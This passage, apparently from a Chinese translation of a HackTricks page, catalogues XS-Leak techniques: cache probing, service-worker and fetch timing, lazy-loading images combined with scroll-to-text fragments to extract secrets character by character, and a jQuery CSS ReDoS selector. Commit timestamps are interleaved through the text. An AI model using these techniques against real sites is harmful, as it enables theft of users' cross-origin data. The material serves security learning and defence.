* **More info**: [ttps://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.gae7bf0b4f7\_0\_1234](https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.gae7bf0b4f7\_0\_1234)
* **Summary:** 可以查明对fetch请求的响应是否是重定向
* **Code Example**:
2022-06-28 17:21:21 +00:00
![](<../.gitbook/assets/image (652).png>)
### 使用AbortController的Fetch <a href="#fetch-with-abortcontroller" id="fetch-with-abortcontroller"></a>
* **Inclusion Methods**: Fetch API
* **Detectable Difference**: Timing
* **More info**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
* **Summary:** 可以尝试加载资源并在加载之前中止加载,根据是否触发错误来判断资源是否已缓存。
* **Code Example**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
使用_fetch_和_setTimeout_与_AbortController_来检测资源是否已缓存并从浏览器缓存中清除特定资源。此外该过程在不缓存新内容的情况下进行。
### 脚本污染
* **包含方法**: HTML元素script
* **可检测差异**: 页面内容
* **更多信息**: [https://xsleaks.dev/docs/attacks/element-leaks/#script-tag](https://xsleaks.dev/docs/attacks/element-leaks/#script-tag)
* **摘要:** 可以**覆盖内置函数**并读取它们的参数,甚至来自**跨源脚本**(无法直接读取),这可能会**泄露有价值的信息**。
* **代码示例**: [https://xsleaks.dev/docs/attacks/element-leaks/#script-tag](https://xsleaks.dev/docs/attacks/element-leaks/#script-tag)
### 服务工作者 <a href="#service-workers" id="service-workers"></a>
* **包含方法**: 弹出窗口
* **可检测差异**: 页面内容
* **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#service-workers](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#service-workers)
* **摘要:** 使用服务工作者测量网页的执行时间。
* **代码示例**:
在给定的场景中,攻击者主动注册一个**服务工作者**在他们的一个域中,具体来说是"attacker.com"。接下来,攻击者从主文档中打开目标网站的一个新窗口,并指示**服务工作者**启动计时器。当新窗口开始加载时,攻击者导航到在前一步骤中获得的引用,该引用由**服务工作者**管理的页面。
2022-06-27 16:53:32 +00:00
在前一步骤中发起的请求到达时,**服务工作者**以**204无内容**状态码做出响应,有效地终止导航过程。此时,**服务工作者**从前一步骤中启动的计时器中捕获一个测量值。这个测量值受到导航过程中由JavaScript引起的延迟持续时间的影响。
{% hint style="warning" %}
在执行时间中,可以**消除** **网络因素**以获得**更精确的测量**。例如,通过在加载页面之前加载页面使用的资源。
{% endhint %}
### 获取时间
* **包含方法**: 获取API
* **可检测差异**: 时间(通常由页面内容、状态码引起)
* **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks)
* **摘要:** 使用[performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow)来测量执行请求所需的时间。也可以使用其他时钟。
* **代码示例**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks)
### 跨窗口时间
* **包含方法**: 弹出窗口
* **可检测差异**: 时间(通常由页面内容、状态码引起)
* **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)
* **摘要:** 使用[performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow)来测量使用`window.open`执行请求所需的时间。也可以使用其他时钟。
* **代码示例**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和**自动化工作流**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## 使用HTML或重新注入
在这里您可以找到从跨源HTML中窃取信息的技术**注入HTML内容**。在某些情况下,您可以**注入HTML但无法注入JS代码**,这些技术非常有趣。
### 悬挂标记
{% content-ref url="dangling-markup-html-scriptless-injection/" %}
[dangling-markup-html-scriptless-injection](dangling-markup-html-scriptless-injection/)
{% endcontent-ref %}
### 图像延迟加载
如果您需要**窃取内容**并且可以**在秘密之前添加HTML**,您应该检查**常见的悬挂标记技术**。\
但是,如果出于任何原因您**必须**逐个字符执行(也许通信是通过缓存命中),您可以使用这个技巧。
在HTML中**图像**有一个“**loading**”属性,其值可以是“**lazy**”。在这种情况下,图像将在查看时加载,而不是在页面加载时加载:
2022-06-27 23:34:20 +00:00
```html
<img src=/something loading=lazy >
```
因此,您可以**添加大量的垃圾字符**(例如**成千上万个"W"**)来**填充网页**,使其在秘密信息之前或之后添加类似于**`<br><canvas height="1850px"></canvas><br>`**的内容。\
因此,如果例如我们的**注入出现在标志之前**,则**图像**将会**加载**,但如果出现在**标志之后**,标志加上垃圾字符将**阻止其加载**(您需要调整放置多少垃圾字符)。这就是在[**这篇文章**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/)中发生的情况。
另一个选择是使用**scroll-to-text-fragment**(如果允许):
#### 滚动到文本片段
但是,您可以让**机器人访问页面**,例如:
```
2022-06-27 23:34:20 +00:00
#:~:text=SECR
```
所以网页将是这样的:**`https://victim.com/post.html#:~:text=SECR`**
其中post.html包含攻击者的垃圾字符和延迟加载图像然后机器人的秘密被添加。
这段文本的作用是让机器人访问页面中包含文本`SECR`的任何文本。由于该文本是秘密,而且它就在**图像下方****只有在猜测的秘密正确时图像才会加载**。因此,您可以利用这一点**逐个字符地窃取秘密**。
一些利用此漏洞的代码示例:[https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e](https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e)
### 图像延迟加载基于时间
如果**无法加载外部图像**以指示攻击者图像是否已加载,另一个选择是尝试**多次猜测字符并测量时间**。如果加载了图像,所有请求将比未加载图像时花费更长的时间。这就是在[**此解决方案的写作中使用的方法**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/) **在这里总结:**
2022-10-12 19:31:39 +00:00
{% content-ref url="xs-search/event-loop-blocking-+-lazy-images.md" %}
[event-loop-blocking-+-lazy-images.md](xs-search/event-loop-blocking-+-lazy-images.md)
{% endcontent-ref %}
2022-06-28 15:48:43 +00:00
### ReDoS
2022-06-28 15:48:43 +00:00
{% content-ref url="regular-expression-denial-of-service-redos.md" %}
[regular-expression-denial-of-service-redos.md](regular-expression-denial-of-service-redos.md)
2022-06-27 23:34:20 +00:00
{% endcontent-ref %}
2022-06-28 15:48:43 +00:00
### CSS ReDoS
如果使用`jQuery(location.hash)`,可以通过计时**确定某些HTML内容是否存在**,这是因为如果选择器`main[id='site-main']`不匹配,则无需检查其余的**选择器**
2022-06-28 15:48:43 +00:00
```javascript
$("*:has(*:has(*:has(*)) *:has(*:has(*:has(*))) *:has(*:has(*:has(*)))) main[id='site-main']")
```
2023-08-03 19:12:22 +00:00
### CSS注入
2022-06-28 15:48:43 +00:00
{% content-ref url="xs-search/css-injection/" %}
[css-injection](xs-search/css-injection/)
{% endcontent-ref %}
## 防御
建议在 [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) 中提供了缓解措施,同时在 [https://xsleaks.dev/](https://xsleaks.dev/) 的每个部分也有。请查看这些信息以了解如何防范这些技术。
2023-08-03 19:12:22 +00:00
## 参考资料
2022-06-28 15:48:43 +00:00
* [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf)
2022-06-27 23:34:20 +00:00
* [https://xsleaks.dev/](https://xsleaks.dev)
* [https://github.com/xsleaks/xsleaks](https://github.com/xsleaks/xsleaks)
* [https://xsinator.com/](https://xsinator.com/)
* [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
支持HackTricks的其他方式
2022-04-28 16:01:33 +00:00
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)系列
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
</details>
2022-08-31 22:35:39 +00:00
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
2022-08-31 22:35:39 +00:00
\
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 可以轻松构建和**自动化工作流程**,利用世界上**最先进**的社区工具。\
2023-08-03 19:12:22 +00:00
立即获取访问权限:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}